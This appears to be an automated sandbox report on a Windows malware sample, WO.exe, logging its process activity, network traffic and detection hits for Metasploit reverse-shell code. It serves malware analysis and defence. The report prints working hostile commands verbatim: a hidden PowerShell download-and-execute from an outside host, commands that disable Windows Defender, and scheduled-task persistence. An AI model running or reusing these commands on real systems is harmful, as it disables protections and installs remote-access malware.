Source: C:\Users\user\AppData\Local\Temp\reddit.exe | Code function: 4x nop then mov cl, 90h (6_2_00404823)
Source: global traffic | TCP traffic: 192.168.2.4:49731 -> 147.185.221.23:1121
Source: global traffic | HTTP traffic detected: GET /file/~d35Ci~adCQqRGWGduhs.exe HTTP/1.1, Host: f.neko.pe, Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 147.185.221.23
Source: Joe Sandbox View | ASN Name: A2HOSTINGUS
Source: Joe Sandbox View | ASN Name: SALSGIVERUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic | Suricata IDS: 2820208 - Severity 1 - ETPRO MALWARE Possible Metasploit Payload (AB Template PDB) : 185.151.51.214:443 -> 192.168.2.4:49730
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
Source: C:\Users\user\AppData\Local\Temp\reddit.exe | Code function: 6_2_00690095 WSASocketA,connect,recv,closesocket
Source: global traffic | HTTP traffic detected: GET /file/~d35Ci~adCQqRGWGduhs.exe HTTP/1.1, Host: f.neko.pe, Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: f.neko.pe
Source: reddit.exe.5.dr | String found in binary or memory: http://www.apache.org/
Source: reddit.exe, 00000006.00000002.2895673835.0000000000415000.00000002.00000001.01000000.00000005.sdmp, reddit.exe, 0000001B.00000000.1807381222.0000000000415000.00000002.00000001.01000000.00000005.sdmp, reddit.exe, 0000001C.00000002.2895738528.0000000000415000.00000002.00000001.01000000.00000005.sdmp, reddit.exe, 00000035.00000000.2341086873.0000000000415000.00000002.00000001.01000000.00000005.sdmp, reddit.exe.5.dr | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: reddit.exe.5.dr | String found in binary or memory: http://www.zeustech.net/
Source: WO.exe | String found in binary or memory: https://f.neko.pe/file/~d35Ci~adCQqRGW
Source: WO.exe, WO.exe, 00000030.00000003.2342762090.0000000002396000.00000004.00000020.00020000.00000000.sdmp, WO.exe, 00000030.00000003.2342850075.0000000002190000.00000004.00000020.00020000.00000000.sdmp, WO.exe, 00000030.00000003.2342762090.0000000002390000.00000004.00000020.00020000.00000000.sdmp, 4784.bat.0.dr, 481C.bat.48.dr, 703A.bat.18.dr, 6F7F.bat.17.dr | String found in binary or memory: https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | HTTPS traffic detected: 185.151.51.214:443 -> 192.168.2.4:49730 version: TLS 1.2

System Summary

Source: sslproxydump.pcap, type: PCAP | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: 53.0.reddit.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: 28.2.reddit.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: 53.2.reddit.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: 6.0.reddit.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: 27.0.reddit.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: 6.2.reddit.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: 27.2.reddit.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: 28.0.reddit.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: 00000006.00000002.2895821708.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: 00000035.00000002.2895737974.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: 0000001B.00000002.2895620558.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: 00000006.00000002.2895574683.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: 00000035.00000002.2895573514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: 0000001C.00000002.2895801436.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: 00000006.00000000.1732936032.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: 0000001C.00000000.1807451210.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: 0000001B.00000002.2895931053.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: 00000035.00000000.2341032369.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: 0000001B.00000000.1807295375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: 0000001C.00000002.2895627672.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: C:\Users\user\AppData\Local\Temp\reddit.exe, type: DROPPED | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\reddit.exe
Source: C:\Users\user\Desktop\WO.exe | Code function: 0_2_0000000140013021
Source: C:\Users\user\Desktop\WO.exe | Code function: 0_2_0000000140013507
Source: C:\Users\user\Desktop\WO.exe | Code function: 0_2_0000000140010210
Source: C:\Users\user\Desktop\WO.exe | Code function: 0_2_0000000140015220
Source: C:\Users\user\Desktop\WO.exe | Code function: 0_2_000000014000EA48
Source: C:\Users\user\Desktop\WO.exe | Code function: 0_2_0000000140014E80
Source: C:\Users\user\Desktop\WO.exe | Code function: 0_2_0000000140014E90
Source: C:\Users\user\Desktop\WO.exe | Code function: 0_2_0000000140012E97
Source: C:\Users\user\Desktop\WO.exe | Code function: 0_2_0000000140015F30
Source: C:\Users\user\Desktop\WO.exe | Code function: 0_2_000000014000B758
Source: C:\Users\user\Desktop\WO.exe | Code function: 0_2_0000000140013798
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 17_2_0000000140013021
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 17_2_0000000140013507
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 17_2_0000000140010210
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 17_2_0000000140015220
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 17_2_000000014000EA48
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 17_2_0000000140014E80
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 17_2_0000000140014E90
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 17_2_0000000140012E97
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 17_2_0000000140015F30
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 17_2_000000014000B758
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 17_2_0000000140013798
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 18_2_0000000140013021
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 18_2_0000000140013507
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 18_2_0000000140010210
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 18_2_0000000140015220
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 18_2_000000014000EA48
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 18_2_0000000140014E80
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 18_2_0000000140014E90
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 18_2_0000000140012E97
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 18_2_0000000140015F30
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 18_2_000000014000B758
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 18_2_0000000140013798
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 48_2_0000000140013021
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 48_2_0000000140013507
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 48_2_0000000140010210
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 48_2_0000000140015220
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 48_2_000000014000EA48
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 48_2_0000000140014E80
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 48_2_0000000140014E90
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 48_2_0000000140012E97
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 48_2_0000000140015F30
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 48_2_000000014000B758
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 48_2_0000000140013798
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: String function: 000000014001F8E8 appears 33 times
Source: WO.exe, 00000000.00000002.1738273571.00000000004AD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Ex vs WO.exe
Source: WO.exe, 00000011.00000002.1814326475.000000000044A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs WO.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
Matched rule: Windows_Trojan_Metasploit_4a1c4da8 (reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23), matched in the following sources:
Source: sslproxydump.pcap, type: PCAP
Source: 53.0.reddit.exe.400000.0.unpack, type: UNPACKEDPE
Source: 28.2.reddit.exe.400000.0.unpack, type: UNPACKEDPE
Source: 53.2.reddit.exe.400000.0.unpack, type: UNPACKEDPE
Source: 6.0.reddit.exe.400000.0.unpack, type: UNPACKEDPE
Source: 27.0.reddit.exe.400000.0.unpack, type: UNPACKEDPE
Source: 6.2.reddit.exe.400000.0.unpack, type: UNPACKEDPE
Source: 27.2.reddit.exe.400000.0.unpack, type: UNPACKEDPE
Source: 28.0.reddit.exe.400000.0.unpack, type: UNPACKEDPE
Source: 00000006.00000002.2895821708.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000035.00000002.2895737974.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 0000001B.00000002.2895620558.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: 00000006.00000002.2895574683.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: 00000035.00000002.2895573514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: 0000001C.00000002.2895801436.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000006.00000000.1732936032.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: 0000001C.00000000.1807451210.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: 0000001B.00000002.2895931053.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000035.00000000.2341032369.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: 0000001B.00000000.1807295375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: 0000001C.00000002.2895627672.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\reddit.exe, type: DROPPED
Source: reddit.exe.5.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.evad.winEXE@102/44@1/2
Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\AppData\Roaming\HiddenScripts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1028:120:WilError_03
Source: C:\Users\user\Desktop\WO.exe | File created: C:\Users\user\AppData\Local\Temp\4782.tmp
Source: C:\Users\user\Desktop\WO.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe"
Source: C:\Users\user\Desktop\WO.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\WO.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: WO.exe | ReversingLabs: Detection: 57%
Source: unknown | Process created: C:\Users\user\Desktop\WO.exe "C:\Users\user\Desktop\WO.exe"
Source: C:\Users\user\Desktop\WO.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\reddit.exe "C:\Users\user\AppData\Local\Temp\reddit.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "RunRedditLogon" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc onlogon /rl highest /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditMinute"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "RunRedditMinute" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc minute /mo 1 /rl highest /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc config WinDefend start= disabled
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net stop WinDefend
Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 stop WinDefend
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
Source: unknown | Process created: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6F6D.tmp\6F7E.tmp\6F7F.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7038.tmp\7039.tmp\703A.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\reddit.exe "C:\Users\user\AppData\Local\Temp\reddit.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\reddit.exe "C:\Users\user\AppData\Local\Temp\reddit.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditMinute"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditMinute"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc config WinDefend start= disabled
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc config WinDefend start= disabled
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net stop WinDefend
Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 stop WinDefend
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net stop WinDefend
Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 stop WinDefend
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
Source: unknown | Process created: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\481A.tmp\481B.tmp\481C.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\reddit.exe "C:\Users\user\AppData\Local\Temp\reddit.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditMinute"
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\WO.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\WO.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
